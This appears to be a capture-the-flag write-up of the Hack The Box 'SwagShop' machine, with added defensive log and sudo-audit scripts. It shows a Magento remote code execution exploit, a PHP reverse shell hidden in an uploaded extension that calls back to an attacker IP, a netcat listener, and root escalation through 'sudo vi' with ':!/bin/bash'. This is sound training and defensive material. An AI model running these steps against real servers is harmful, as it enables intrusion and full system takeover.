
SwagShop Hack The Box Writeup

Bad3r
September 28th, 2019 · 2 min read

This post documents the complete walkthrough of SwagShop, an active vulnerable VM created by ch4p and hosted at Hack The Box.

Description
SwagShop is a retired GNU/Linux eCommerce web server using an outdated/unpatched version of Magento with known vulnerabilities and exploits. The Linux system allows the Apache user to run a sudo command with no password required, allowing privilege escalation to root.

❯ Information Gathering

Starting with an Nmap scan:

Nmap cheat sheet

➜ nmap -sV -sC -oA namp 10.10.10.140
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux;

From the OpenSSH version banner we guessed this box to be Ubuntu Xenial, and Nmap finds 80/tcp open.

❯ Web Pages Enumeration

Going to http://10.10.10.140 in the browser

htb_swagshop_web.png

we find a Magento shop with some HTB swag available. The pages are copyrighted 2014, and we can see on this page that the last version released in 2014 was 1.9.x.

Browsing around, you will notice that the items are placed under a folder called index.php/ (http://10.10.10.140/index.php/).

By running two GoBuster scans, on http://10.10.10.140/ and on http://10.10.10.140/index.php/, we find the admin panel at http://10.10.10.140/index.php/admin/

admin_login.png

and http://10.10.10.140/downloader/, which gives access to Magento Connect Manager. There you can upload new Magento packages, which can contain PHP files.

downloader_login.png

❯ Exploitation

We use searchsploit to find exploits for Magento 1.9.x

searchsploit.png

and we notice a remote code execution exploit:

Exploit Title                              | Path (/usr/share/exploitdb/)
Magento eCommerce - Remote Code Execution  | exploits/xml/webapps/37977.py

We need to tweak the exploit a little, because this box serves the admin panel at $IP/index.php/admin rather than at $IP/admin, which the script expects:

...
target = "http://10.10.10.140/"

if not target.startswith("http"):
    target = "http://" + target

if target.endswith("/"):
    target = target[:-1]

# the admin path on this box is prefixed with /index.php
target_url = target + "/index.php" + "/admin/Cms_Wysiwyg/directive/index/"
...

We run the script:

➜ python 37977.py
WORKED
Check http://10.10.10.140/admin with creds forme:forme

Now we can log in to the admin panel at http://10.10.10.140/index.php/admin and to http://10.10.10.140/downloader with the credentials forme:forme.
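From the defender's side, the chain above leaves a recognisable trail in the Apache access log: requests to the Cms_Wysiwyg directive endpoint the 37977 script targets, POSTs to /downloader/, and a direct request to a freshly uploaded controller file under app/code/community/. The following detection logic is an added example, not part of the original writeup; the log lines are constructed and the rule names are my own.

```python
import re

# Constructed sample Apache combined-format log lines (not captured from the box).
SAMPLE_LOG = """\
10.10.14.115 - - [28/Sep/2019:13:10:01 +0000] "GET /index.php/admin/Cms_Wysiwyg/directive/index/ HTTP/1.1" 200 512 "-" "python-requests/2.22.0"
10.10.14.115 - - [28/Sep/2019:13:10:02 +0000] "POST /index.php/admin/Cms_Wysiwyg/directive/index/ HTTP/1.1" 200 1024 "-" "python-requests/2.22.0"
10.10.14.50 - - [28/Sep/2019:13:11:09 +0000] "GET /index.php/ HTTP/1.1" 200 8821 "-" "Mozilla/5.0"
10.10.14.115 - - [28/Sep/2019:13:20:33 +0000] "POST /downloader/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.10.14.115 - - [28/Sep/2019:13:22:28 +0000] "GET /app/code/community/Lavalamp/Connector/controllers/IndexController.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, timestamp, request line and status are all we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# (rule name, required method or None, path pattern). Paths come from the writeup:
# the directive endpoint the exploit requests, the Connect Manager upload endpoint,
# and a controller file under app/code/community/ being fetched directly.
RULES = [
    ("cms-wysiwyg-directive", None, re.compile(r"/admin/Cms_Wysiwyg/directive/index", re.I)),
    ("connect-manager-post", "POST", re.compile(r"^/downloader/", re.I)),
    ("direct-extension-controller", "GET",
     re.compile(r"^/app/code/community/.+/controllers/.+\.php$", re.I)),
]


def scan(log_text):
    """Return one (rule, ip, method, path) tuple per matching request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        for name, method, pattern in RULES:
            if (method is None or m["method"] == method) and pattern.search(m["path"]):
                findings.append((name, m["ip"], m["method"], m["path"]))
                break
    return findings


def chained_sources(log_text, min_rules=2):
    """IPs that triggered at least `min_rules` distinct rules, i.e. the whole chain."""
    rules_by_ip = {}
    for name, ip, _, _ in scan(log_text):
        rules_by_ip.setdefault(ip, set()).add(name)
    return sorted(ip for ip, names in rules_by_ip.items() if len(names) >= min_rules)
```

Running scan() on the sample flags four requests, all from one client; chained_sources() reduces that to the single IP that walked the whole chain, which is the alert worth paging on.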

❯ Getting a Reverse Shell

Using the Magento Downloader/Magento Connect, we attempt to upload an extension with a PHP reverse shell.

Download any legitimate Magento package; we'll use LavaMagentoBD from GitHub/P34C3-07/LavaMagentoBD. Extract lavalamp_magento_bd.tgz, since we'll have to modify its contents:

➜ tar -xzvf lavalamp_magento_bd.tgz

Edit the file ./App/code/community/Lavalamp/Connector/controllers/IndexController.php and replace its contents with a PHP reverse shell; we'll use php-reverse-shell from GitHub/pentestmonkey/php-reverse-shell. Make sure to change the $ip field to your IP address; we will use port 1234:

$ip = '10.10.14.115'; // CHANGE THIS
$port = 1234;

Get the MD5 hash of the file:

➜ md5sum ./App/code/community/Lavalamp/Connector/controllers/IndexController.php
7587816c42712b0c9fe6dccb2c6c5300 IndexController.php

Copy it, then edit package.xml and replace the IndexController.php hash:

<dir name="controllers">
    <file hash="7587816c42712b0c9fe6dccb2c6c5300"
          name="IndexController.php"/>
</dir>

Compress the files back into a .tgz file:

➜ tar -cvzf lavalamp_magento_bd.tgz ./*

Then upload the file at http://10.10.10.140/downloader/ (log in with the credentials forme:forme). If the extension loads successfully you should see

uploaded.png

Start listening with netcat:

➜ nc -v -n -l -p 1234

Then, in the browser, navigate to http://10.10.10.140/app/code/community/Lavalamp/Connector/controllers/IndexController.php. In the terminal you should see that we got a reverse shell:

➜ nc -nvlp 1234
listening on [any] 1234 ...
connect to [<IP>] from (UNKNOWN) [10.10.10.140] 44650
Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP x86_64 GNU/Linux
 13:22:28 up 32 min,  0 users,  load average: 4.31, 2.61, 1.86
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

We are now connected as www-data, but we still need to spawn a bash shell with a tty:

$ python -c 'import pty; pty.spawn("/bin/bash")'

❯ Own User

Now that we have a shell on the box we can view /etc/passwd:

➜ www-data@swagshop:/$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:...
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:...
systemd-network:x:101:103:systemd Network Management,,,:...
systemd-resolve:x:102:104:systemd Resolver,,,:...
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/...
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
haris:x:1000:1000:haris,,,:/home/haris:/bin/bash

We notice the user haris:

➜ www-data@swagshop:/$ ls -alh /home/haris
total 36K
drwxr-xr-x 3 haris haris 4.0K May  8 09:21 .
drwxr-xr-x 3 root  root  4.0K May  2 14:48 ..
-rw------- 1 haris haris   54 May  2 14:56 .Xauthority
lrwxrwxrwx 1 root  root     9 May  8 09:20 .bash_history -> /dev/null
-rw-r--r-- 1 haris haris  220 May  2 14:48 .bash_logout
-rw-r--r-- 1 haris haris 3.7K May  2 14:48 .bashrc
drwx------ 2 haris haris 4.0K May  2 14:49 .cache
-rw------- 1 root  root     1 May  8 09:20 .mysql_history
-rw-r--r-- 1 haris haris  655 May  2 14:48 .profile
-rw-r--r-- 1 haris haris    0 May  2 14:49 .sudo_as_admin_successful
-rw-r--r-- 1 haris haris   33 May  8 09:01 user.txt

and find user.txt:

➜ www-data@swagshop:/$ cat /home/haris/user.txt
<user flag>

❯ Privilege Escalation: Own Root

Enumerating the system, we run sudo -l, which lists the user's sudo privileges. It shows that www-data may run vi as root on any path matching /var/www/html/*, with no password required:

➜ www-data@swagshop:/$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

Open a file under /var/www/html/ using vi:

➜ www-data@swagshop:/$ sudo /usr/bin/vi /var/www/html/Bad3r.sh
Vim: Warning: Output is not to a terminal
Vim: Warning: Input is not from a terminal

E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
    builtin_amiga
    builtin_beos-ansi
    builtin_ansi
    builtin_pcansi
    builtin_win32
    builtin_vt320
    builtin_vt52
    builtin_xterm
    builtin_iris-ansi
    builtin_debug
    builtin_dumb
defaulting to 'ansi'

Inside vi you can spawn a root shell:

:!/bin/bash
~
~

In the interactive shell we can get the root flag:

➜ whoami
root
➜ cat /root/root.txt
<root flag>
   ___ ___
  /| |/|\| |\
 /_| ´ |.` |_\           We are open! (Almost)
 |  |  .  |  |
 | --- | --- | --------------------------------- |
 |  |  .  |  |  Join the beta HTB Swag Store!     |
 | ___ | .__ |  https://hackthebox.store/password |

PS: Use root flag as password!
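From the defender's side, this sudo rule is the kind of thing a periodic audit should catch before anyone reads /etc/sudoers by hand. The following is an added example of my own, not from the writeup: it parses `sudo -l` output in the layout shown above and flags rules that allow an editor with a built-in shell escape (vi's :!command) to run as root, noting the NOPASSWD tag and the wildcard path. The sample output is constructed; the systemctl rule is invented as a harmless control case.

```python
import re

# Constructed sample in the layout `sudo -l` prints; the vi rule mirrors the
# writeup's finding, the systemctl rule is invented as a harmless control case.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
    (root) /usr/bin/systemctl restart apache2
"""

# Editors that can run an arbitrary command from inside (vi's :!cmd, used above).
SHELL_ESCAPE_EDITORS = {"vi", "vim", "view", "vimdiff"}

# A command rule line: "(runas) [TAG: ...] /path/to/binary args..."
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")


def parse_rules(text):
    """Return (runas, nopasswd, binary, args) for every command rule in `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults lines and headers are not command rules
        binary, *args = m["cmd"].split()
        rules.append((m["runas"], "NOPASSWD:" in m["tags"], binary, args))
    return rules


def audit(text):
    """Flag rules that hand out a root shell through an editor; returns (binary, reasons)."""
    findings = []
    for runas, nopasswd, binary, args in parse_rules(text):
        name = binary.rsplit("/", 1)[-1]
        runas_user = runas.split(":")[0].strip()  # "(root)" or "(ALL : ALL)" both reach root
        if name not in SHELL_ESCAPE_EDITORS or runas_user not in {"root", "ALL"}:
            continue
        reasons = [f"{name} can spawn a shell with :!"]
        if any("*" in a for a in args):
            reasons.append("wildcard path argument")
        if nopasswd:
            reasons.append("no password required")
        findings.append((binary, reasons))
    return findings
```

The usual fix for a rule like this is sudoedit (which copies the file and edits it as the calling user) or a dedicated deploy script, rather than granting a full editor as root.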
